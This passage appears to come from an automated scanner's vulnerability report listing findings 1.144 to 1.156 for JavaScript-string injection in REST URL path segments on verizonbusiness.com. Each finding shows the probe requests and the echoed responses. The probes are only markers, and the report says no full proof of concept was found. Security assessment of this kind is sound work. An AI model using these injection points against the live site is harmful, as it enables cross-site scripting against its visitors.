Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products7fdb7";524858dde52/it/managed-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.144. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3c2'%3b36e386e35b0 was submitted in the REST URL parameter 1. This input was echoed as cd3c2';36e386e35b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productscd3c2'%3b36e386e35b0/it/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productscd3c2';36e386e35b0/it/managed-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.145. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de848"%3bbd9c29815fb was submitted in the REST URL parameter 2. This input was echoed as de848";bd9c29815fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itde848"%3bbd9c29815fb/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itde848";bd9c29815fb/managed-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.146. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33677'%3b6b36e1baa5f was submitted in the REST URL parameter 2. This input was echoed as 33677';6b36e1baa5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it33677'%3b6b36e1baa5f/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42309
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it33677';6b36e1baa5f/managed-it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.147. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11798"%3bcda9f0fc744 was submitted in the REST URL parameter 3. This input was echoed as 11798";cda9f0fc744 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-it11798"%3bcda9f0fc744/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:39 GMT
Content-Type: text/html
Content-Length: 43037
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-it11798";cda9f0fc744/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.148. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f37'%3bcaf8722c66c was submitted in the REST URL parameter 3. This input was echoed as c1f37';caf8722c66c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-itc1f37'%3bcaf8722c66c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43035
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-itc1f37';caf8722c66c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.149. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe89'%3bdec64a1e8d0 was submitted in the REST URL parameter 1. This input was echoed as dbe89';dec64a1e8d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsdbe89'%3bdec64a1e8d0/it/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Date: Wed, 17 Nov 2010 00:40:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsdbe89';dec64a1e8d0/it/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.150. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a602"%3be426c879e4f was submitted in the REST URL parameter 1. This input was echoed as 7a602";e426c879e4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7a602"%3be426c879e4f/it/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Date: Wed, 17 Nov 2010 00:40:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products7a602";e426c879e4f/it/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.151. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deab2'%3b4cd9ccfc36d was submitted in the REST URL parameter 2. This input was echoed as deab2';4cd9ccfc36d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itdeab2'%3b4cd9ccfc36d/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:53 GMT
Content-Type: text/html
Content-Length: 42309
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/itdeab2';4cd9ccfc36d/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.152. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a0a8"%3b9be4f68ed28 was submitted in the REST URL parameter 2. This input was echoed as 3a0a8";9be4f68ed28 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it3a0a8"%3b9be4f68ed28/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:45 GMT
Content-Type: text/html
Content-Length: 42309
Date: Wed, 17 Nov 2010 00:40:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it3a0a8";9be4f68ed28/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.153. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3535"%3bb60e80bc0c7 was submitted in the REST URL parameter 3. This input was echoed as f3535";b60e80bc0c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/prof-svcsf3535"%3bb60e80bc0c7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43035
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/prof-svcsf3535";b60e80bc0c7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.154. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b70c'%3bbbd577dcfe5 was submitted in the REST URL parameter 3. This input was echoed as 4b70c';bbd577dcfe5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/prof-svcs4b70c'%3bbbd577dcfe5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43033
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/prof-svcs4b70c';bbd577dcfe5/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.155. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77252'%3b40c8498d24e was submitted in the REST URL parameter 1. This input was echoed as 77252';40c8498d24e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products77252'%3b40c8498d24e/mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products77252';40c8498d24e/mobility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.156. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f859"%3b9f422dac22d was submitted in the REST URL parameter 1. This input was echoed as 1f859";9f422dac22d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1f859"%3b9f422dac22d/mobility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
